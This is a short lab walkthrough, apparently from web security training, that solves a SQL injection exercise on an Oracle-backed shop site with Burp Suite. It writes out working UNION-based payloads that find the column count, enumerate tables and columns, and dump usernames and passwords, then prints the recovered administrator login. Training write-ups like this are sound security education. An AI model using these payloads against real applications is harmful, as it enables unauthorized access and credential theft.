Skip to main content

SQL injection attack, listing the database contents on Oracle

1

Let's filter for Accessories.

2

Since we are proxying the traffic through Burp Suite, we can go to the Proxy > HTTP History tab to view this request.

Let's forward this request to the Repeater for further modification.

Once in the Repeater, let's set the category parameter to the following:

' UNION SELECT 'test' FROM dual--

4

Since the application returns an error, we know that the number of columns in the current query is more than 1.

Let's set the category parameter to the following:

' UNION SELECT 'test', 'test' FROM dual--

5

Now that we know the current query has two columns, we can start enumerating the tables.

' UNION SELECT table_name, NULL FROM all_tables--

6

Next, we need to find the columns present in the USERS_EABGJF table.

We can do that by setting the category parameter to the following:

' UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name='USERS_EABGJF'--

7

We can now retrieve the usernames and password from the USERNAME_LIVOZB and PASSWORD_XJPXQQ columns respectively.

For that we have to set the category parameter to the following:

' UNION SELECT USERNAME_LIVOZB, PASSWORD_XJPXQQ FROM USERS_EABGJF--

8

We can now login as the administrator using the following credentials:

UsernamePassword
administratorayzzulz0enewtllx1szu

9

We have solved the lab

10